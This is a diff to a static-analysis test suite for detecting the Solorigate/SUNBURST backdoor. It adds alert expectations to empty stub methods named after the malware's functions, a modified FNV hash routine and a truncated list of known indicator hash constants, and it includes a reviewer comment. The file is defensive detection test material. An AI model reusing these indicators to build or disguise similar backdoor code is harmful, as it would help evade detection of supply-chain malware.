diff --git a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownMethodNamesAboveThreshold.qlref b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownMethodNamesAboveThreshold.qlref
index 747fb006e437..7f5e000495e2 100644
--- a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownMethodNamesAboveThreshold.qlref +++ b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownMethodNamesAboveThreshold.qlref @@ -1 +1,2 @@ -NumberOfKnownMethodNamesAboveThreshold.ql +query: NumberOfKnownMethodNamesAboveThreshold.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/campaigns/Solorigate/test/Solorigate/SwallowEverythingExceptionHandler.qlref b/csharp/ql/campaigns/Solorigate/test/Solorigate/SwallowEverythingExceptionHandler.qlref index 538eee55bf20..e49d40d16e12 100644 --- a/csharp/ql/campaigns/Solorigate/test/Solorigate/SwallowEverythingExceptionHandler.qlref +++ b/csharp/ql/campaigns/Solorigate/test/Solorigate/SwallowEverythingExceptionHandler.qlref @@ -1 +1,2 @@ -SwallowEverythingExceptionHandler.ql +query: SwallowEverythingExceptionHandler.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/campaigns/Solorigate/test/Solorigate/test.cs b/csharp/ql/campaigns/Solorigate/test/Solorigate/test.cs index 8680d8346940..cc4ad9eb3556 100644 --- a/csharp/ql/campaigns/Solorigate/test/Solorigate/test.cs +++ b/csharp/ql/campaigns/Solorigate/test/Solorigate/test.cs @@ -6,12 +6,12 @@ class FalsePositiveCases // regular FVN ulong GetRegularFvnHash(string s) { - ulong num = 14695981039346656037UL; /* FNV base offset */ + ulong num = 14695981039346656037UL; /* FNV base offset */ // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] foreach (byte b in Encoding.UTF8.GetBytes(s)) { num ^= (ulong)b; - num *= 1099511628211UL; /* FNV prime */ + num *= 1099511628211UL; /* FNV prime */ // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] } return num; 
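Review bot: The two `// $ Alert[cs/solorigate/number-of-known-hashes-above-threshold]` expectations added to `GetRegularFvnHash` sit inside `class FalsePositiveCases`, under the `// regular FVN` comment, so the file now reads as if a case meant to stay clean is expected to alert. If the class name refers only to the modified-FNV detection, a one-line comment above the function saying that the plain FNV constants are still expected to count towards the known-hashes threshold would remove the ambiguity. If these hits are unwanted, `// $ SPURIOUS: Alert[cs/solorigate/number-of-known-hashes-above-threshold]` records that instead of asserting them as correct detections. The closing brace of the function lies outside the hunk.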
@@ -22,24 +22,24 @@ class TestCases { ulong GetRegularFvnHash(string s) { - ulong num = 14695981039346656037UL; + ulong num = 14695981039346656037UL; // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] try { foreach (byte b in Encoding.UTF8.GetBytes(s)) { num ^= (ulong)b; - num *= 1099511628211UL; + num *= 1099511628211UL; // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] } } catch // BUG : SwallowEverythingExceptionHandler { - } + } // $ Alert[cs/solorigate/swallow-everything-exception] - return num ^ 6605813339339102567UL; // BUG (ModifiedFnvFunctionDetection.ql) + return num ^ 6605813339339102567UL; // BUG (ModifiedFnvFunctionDetection.ql) // $ Alert[cs/solorigate/modified-fnv-function-detection] Alert[cs/solorigate/number-of-known-hashes-above-threshold] } - enum JobEngine + enum JobEngine // $ Alert[cs/solorigate/number-of-known-commands-in-enum-above-threshold] { Idle, Exit, 
@@ -62,220 +62,220 @@ enum JobEngine None } - void Abort() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void AddFileExecutionEngine() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void AddRegistryExecutionEngine() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void AdjustTokenPrivileges() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Base64Decode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Base64Encode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ByteArrayToHexString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void CheckServerConnection() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Close() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void CloseHandle() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void CollectSystemDescription() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Compress() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void CreateSecureString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void CreateString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void CreateUploadRequest() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void CreateUploadRequestImpl() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Decompress() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void DecryptShort() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Deflate() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void DelayMin() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void DelayMs() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void DeleteFile() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void DeleteRegistryValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void DeleteValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ExecuteEngine() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void FileExists() { } // BUG : 
NumberOfKnownMethodNamesAboveThreshold - void GetAddresses() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetAddressFamily() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetArgumentIndex() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetBaseUri() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetBaseUriImpl() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetCache() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetCurrentProcess() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetCurrentString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetDescriptionId() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetFileHash() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetFileSystemEntries() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetHash() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetHive() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetIntArray() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetIPHostEntry() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetManagementObjectProperty() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetNetworkAdapterConfiguration() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetNewOwnerName() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetNextString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetNextStringEx() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetOrCreateUserID() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetOrionImprovementCustomerId() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetOSVersion() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetPreviousString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetProcessByDescription() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void 
GetRegistrySubKeyAndValueNames() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetStringHash() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetSubKeyAndValueNames() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetUserAgent() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetWebProxy() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void HexStringToByteArray() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Inflate() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Initialize() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void InitiateSystemShutdownExW() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void IsNullOrInvalidName() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void IsSynchronized() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void KillTask() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void LookupPrivilegeValueW() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void OpenProcessToken() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ParseServiceResponse() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Quote() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ReadConfig() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ReadDeviceInfo() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ReadRegistryValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ReadReportStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ReadServiceStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void RebootComputer() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void RunTask() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SearchAssemblies() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void 
SearchConfigurations() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SearchServices() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetAutomaticMode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetKeyOwner() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetKeyOwnerWithPrivileges() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetKeyPermissions() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetManualMode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetProcessPrivilege() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetRegistryValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetTime() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SplitString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ToString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void TrackEvent() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void TrackProcesses() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Unquote() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Unzip() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Update() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void UpdateBuffer() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void UpdateNotification() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void UploadSystemDescription() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Valid() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void WriteConfig() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void WriteFile() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void WriteReportStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void WriteServiceStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Zip() { } // BUG : 
NumberOfKnownMethodNamesAboveThreshold + void Abort() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void AddFileExecutionEngine() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void AddRegistryExecutionEngine() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void AdjustTokenPrivileges() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Base64Decode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Base64Encode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ByteArrayToHexString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void CheckServerConnection() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Close() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void CloseHandle() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void CollectSystemDescription() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Compress() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void CreateSecureString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void CreateString() { } 
// BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void CreateUploadRequest() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void CreateUploadRequestImpl() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Decompress() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void DecryptShort() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Deflate() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void DelayMin() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void DelayMs() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void DeleteFile() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void DeleteRegistryValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void DeleteValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ExecuteEngine() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void FileExists() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetAddresses() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ 
Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetAddressFamily() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetArgumentIndex() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetBaseUri() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetBaseUriImpl() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetCache() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetCurrentProcess() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetCurrentString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetDescriptionId() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetFileHash() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetFileSystemEntries() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetHash() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetHive() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetIntArray() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetIPHostEntry() { } // BUG 
: NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetManagementObjectProperty() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetNetworkAdapterConfiguration() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetNewOwnerName() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetNextString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetNextStringEx() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetOrCreateUserID() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetOrionImprovementCustomerId() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetOSVersion() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetPreviousString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetProcessByDescription() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetRegistrySubKeyAndValueNames() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetStringHash() { } // BUG : 
NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetSubKeyAndValueNames() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetUserAgent() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetWebProxy() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void HexStringToByteArray() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Inflate() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Initialize() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void InitiateSystemShutdownExW() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void IsNullOrInvalidName() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void IsSynchronized() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void KillTask() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void LookupPrivilegeValueW() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void OpenProcessToken() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ 
Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ParseServiceResponse() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Quote() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ReadConfig() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ReadDeviceInfo() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ReadRegistryValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ReadReportStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ReadServiceStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void RebootComputer() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void RunTask() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SearchAssemblies() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SearchConfigurations() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SearchServices() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetAutomaticMode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void 
SetKeyOwner() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetKeyOwnerWithPrivileges() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetKeyPermissions() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetManualMode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetProcessPrivilege() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetRegistryValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetTime() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SplitString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ToString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void TrackEvent() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void TrackProcesses() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Unquote() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Unzip() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ 
Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Update() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void UpdateBuffer() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void UpdateNotification() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void UploadSystemDescription() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Valid() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void WriteConfig() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void WriteFile() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void WriteReportStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void WriteServiceStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Zip() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] void Hashes() { ulong[] hashes = { // BUG : NumberOfKnownHashesAboveThreshold - 10063651499895178962, 10235971842993272939, 10296494671777307979, - 10336842116636872171, 10374841591685794123, 10393903804869831898, - 10463926208560207521, 10484659978517092504, 10501212300031893463, - 10545868833523019926, 10657751674541025650, 106672141413120087, 10734127004244879770, - 10829648878147112121, 1099511628211, 11073283311104541690, 1109067043404435916, - 11109294216876344399, 
11266044540366291518, 11385275378891906608, - 11771945869106552231, 11801746708619571308, 11818825521849580123, - 11913842725949116895, 12027963942392743532, 12094027092655598256, - 12343334044036541897, 12445177985737237804, 12445232961318634374, - 12574535824074203265, 12679195163651834776, 12709986806548166638, - 12718416789200275332, 12785322942775634499, 12790084614253405985, - 12969190449276002545, 13014156621614176974, 13029357933491444455, - 13135068273077306806, 13260224381505715848, 13316211011159594063, - 13464308873961738403, 13544031715334011032, 13581776705111912829, - 13599785766252827703, 13611051401579634621, 13611814135072561278, - 13655261125244647696, 1367627386496056834, 1368907909245890092, 13693525876560827283, - 13783346438774742614, 13799353263187722717, 13825071784440082496, - 13852439084267373191, 13876356431472225791, 14055243717250701608, - 14079676299181301772, 14095938998438966337, 14111374107076822891, - 14193859431895170587, 14226582801651130532, 14243671177281069512, - 14256853800858727521, 14480775929210717493, 14482658293117931546, - 14513577387099045298, 14630721578341374856, 14695981039346656037, - 14710585101020280896, 1475579823244607677, 14868920869169964081, 14968320160131875803, - 14971809093655817917, 15039834196857999838, 15092207615430402812, - 15114163911481793350, 15194901817027173566, 15267980678929160412, - 15457732070353984570, 15514036435533858158, 15535773470978271326, - 15587050164583443069, 155978580751494388, 15695338751700748390, 15997665423159927228, - 16066522799090129502, 16066651430762394116, 16112751343173365533, - 16130138450758310172, 1614465773938842903, 16292685861617888592, 16335643316870329598, - 16423314183614230717, 16570804352575357627, 1682585410644922036, 16858955978146406642, - 16990567851129491937, 17017923349298346219, 17097380490166623672, - 17109238199226571972, 17204844226884380288, 17291806236368054941, - 17351543633914244545, 17439059603042731363, 17574002783607647274, - 
17624147599670377042, 17633734304611248415, 17683972236092287897, - 17849680105131524334, 17939405613729073960, 17956969551821596225, - 17978774977754553159, 17984632978012874803, 17997967489723066537, - 18147627057830191163, 18150909006539876521, 18159703063075866524, - 18246404330670877335, 18294908219222222902, 18392881921099771407, - 18446744073709551613, 191060519014405309, 2032008861530788751, 2128122064571842954, - 2147483647, 2147745794, 2380224015317016190, 2478231962306073784, - 2532538262737333146, 2589926981877829912, 2597124982561782591, 2600364143812063535, - 2717025511528702475, 2734787258623754862, 27407921587843457, 2760663353550280147, - 2797129108883749491, 2810460305047003196, 292198192373389586, 2934149816356927366, - 3045986759481489935, 3178468437029279937, 3200333496547938354, 3320026265773918739, - 3320767229281015341, 3341747963119755850, 3407972863931386250, 3413052607651207697, - 3413886037471417852, 3421197789791424393, 3421213182954201407, 3425260965299690882, - 3538022140597504361, 3575761800716667678, 3588624367609827560, 3626142665768487764, - 3642525650883269872, 3656637464651387014, 3660705254426876796, 3769837838875367802, - 3778500091710709090, 3796405623695665524, 3869935012404164040, 3890769468012566366, - 3890794756780010537, 397780960855462669, 4030236413975199654, 4088976323439621041, - 4454255944391929578, 4501656691368064027, 4578480846255629462, 4821863173800309721, - 4931721628717906635, 506634811745884560, 5132256620104998637, 5183687599225757871, - 521157249538507889, 5219431737322569038, 541172992193764396, 5415426428750045503, - 5449730069165757263, 5587557070429522647, 5614586596107908838, 576626207276463000, - 5942282052525294911, 5945487981219695001, 5984963105389676759, 607197993339007484, - 6088115528707848728, 6116246686670134098, 6180361713414290679, 6195833633417633900, - 6274014997237900919, 640589622539783622, 6461429591783621719, 6491986958834001955, - 6508141243778577344, 6605813339339102567, 
